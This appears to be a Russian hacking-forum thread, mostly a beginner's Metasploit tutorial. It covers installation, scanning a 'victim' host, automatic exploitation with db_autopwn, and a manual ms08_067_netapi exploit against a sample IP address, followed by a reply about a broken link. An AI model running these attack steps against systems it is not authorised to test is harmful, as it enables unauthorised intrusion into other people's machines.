Основан 26 Июля 2013 года
freehacks.ru fhacks.me fhacks.pw fhacksnplmzxaaoo.onion
HashFlare
Показано с 1 по 2 из 2
  1. #1
    TopicStarter
    Аватар для virtuoso

    Статус
    Offline
    Регистрация
    13.09.2013
    Сообщений
    90
    Репутация
    37 + / -
    Хакинг

    Metasploit Framework


    Metasploit Project — проект, посвященный информационной безопасности. Создан для предоставления информации об уязвимостях, помощи в создании сигнатур для IDS, создания и тестирования эксплоитов. Наиболее известен проект Metasploit Framework — удобная платформа для создания и отладки эксплоитов. Кроме того, проект включает в себя базу опкодов, архив шеллкодов и информацию по исследованиям компьютерной безопасности. Metasploit

    В начале необходимо установить Metasploit Framework. Для этого поставим все необходимые пакеты.

    Код:
    sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems
    sudo apt-get install subversion
    sudo apt-get build-dep ruby
    sudo apt-get install ruby-dev libpcap-dev
    sudo apt-get install rubygems libsqlite3-dev
    sudo gem install sqlite3-ruby
    sudo apt-get install rubygems libmysqlclient-dev
    sudo gem install mysql
    Далее скачиваем Metasploit Framework вот тут: [Только зарегистрированные могут видеть это. ]

    Код:
    wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run
    chmod +x metasploit-latest-linux-installer.run
    И запускаем…

    Код:
    sudo ./metasploit-latest-linux-installer.run
    После установки необходимо обновить Metasploit Framework

    Код:
    sudo msfupdate
    Теперь самый простой вариант использования Metasploit Framework. Запустим консоль.

    Код:
    msfconsole
    Теперь добавим нашу жертву в базу данных и информацию про его порты.

    Код:
    db_nmap -sT -sV 192.168.1.1
    Отправим все на автоматический взлом =). Данная команда стала неактуальной в последних версиях.

    Код:
    db_autopwn -p -t -e
    Если в конце процесса появятся сессии, значит взлом удался. Выбираем сессию и в ходим в нее.

    Код:
    session -i 1
    Альтернатив db_autopwn нет. Использовать эксплоиты можно в ручную. Например так:

    Код:
    #Загружаем нужный нам эксплоит
    use exploit/windows/smb/ms08_067_netapi
    #Смотрим опции
    show options
    #Заполняем необходимые поля например IP адрес жертвы
    set RHOST 192.168.84.58
    #Проверяем актуален ли эксплоит для жертвы
    check
    #Ломаем
    exploit
    Далее можно заняться многим, все зависит от ваших полномочий в системе. Для просмотра команд доступных Вам наберите:

    Код:
    help
    В конце для выхода обратно из сессии и удаления данного хоста из базы данных проделываем следующую операцию:

    Код:
    exit
    hosts -d 192.168.1.1
    Последний раз редактировалось admin; 28.03.2014 в 02:39.

  2. #2
    Аватар для rostik

    Статус
    Offline
    Регистрация
    15.01.2014
    Сообщений
    2
    Репутация
    0 + / -
    Другое
    ссилку на мету поправь, а именно убери последний символ :d

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Информация на сайте предоставлена исключительно в ознакомительных целях, использование знаний в противозаконных целях преследуется по закону! Администрация не несет ответственности за ваши деяния.